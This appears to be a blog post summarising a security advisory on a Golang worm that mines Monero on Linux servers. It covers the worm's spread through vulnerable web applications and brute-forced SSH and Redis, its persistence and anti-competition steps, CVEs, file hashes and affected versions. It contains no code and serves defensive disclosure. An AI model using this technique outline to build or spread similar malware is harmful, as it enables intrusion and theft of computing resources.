Golang Mining Worm Targeting Linux Servers

A new form of malware has been spotted, the code’s main focus is the fraudulent mining of the Monero (XMR) cryptocurrency.

The worm spreads by attempting to exploit four web application vulnerabilities or by brute forcing Secure Shell (SSH) and Redis database services on the target system using a hardcoded set of credentials. Once the worm is established on the system it downloads and executes three scripts.

The first script contains a set of installation instructions, the second and third scripts contain the code and configuration for the cryptocurrency miner. When the first script executes, it attempts to carry out a series of activities:

  • The script attempts to disable security features including SELinux.
  • A scheduled job is created that downloads and runs the installation script every fifteen minutes in order to maintain persistence.
  • All processes with a CPU usage greater than 30% are killed.
  • The script attempts to connect to all known SSH hosts in the directory and execute the payload.
  • The cryptocurrency miner is installed and run as a service.

The malware will also block outgoing traffic on ports 3333, 5555, 7777, and 9999, which F5 says is likely due to these ports being used by other cryptocurrency miners.

For further information

  • CVE-2019-9082
  • CVE-2019-3396
  • CVE-2018-7600

Indicators of Compromise

MD5 File Hashes

  • 6dcbd7ff8aeeb8e9fff861cbea912c2d

SHA1 File Hashes

  • ae01eaa4b42a99b9efbfa561ce16b971ec9e4b3a

SHA256 File Hashes

  • b6703bbc7b416cfcc1c7dbb3cc9a444dfa615e4a59e32b419d259fb7a20b9f12

Affected Platforms

Linux servers with one or more of the following enabled or installed:

  • SSH
  • Redis Database services – All versions
  • ThinkPHP – Versions prior to 3.2.4
  • Atlassian Confluence Server and Confluence Data Center:
    • Versions prior to 6.6.12
    • Versions from 6.7.0 prior to version 6.12.3
    • Versions 6.13.0 prior to version 6.13.3
    • Version 6.14.0 prior to 6.14.2
  • Drupal:
    • Versions 8.2.x and earlier
    • Versions 7.x prior to version 7.58
    • Versions 8.3.x prior to version 8.3.9
    • Versions 8.4.x prior to version 8.4.6
    • Versions 8.5.x prior to version 8.5.1

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: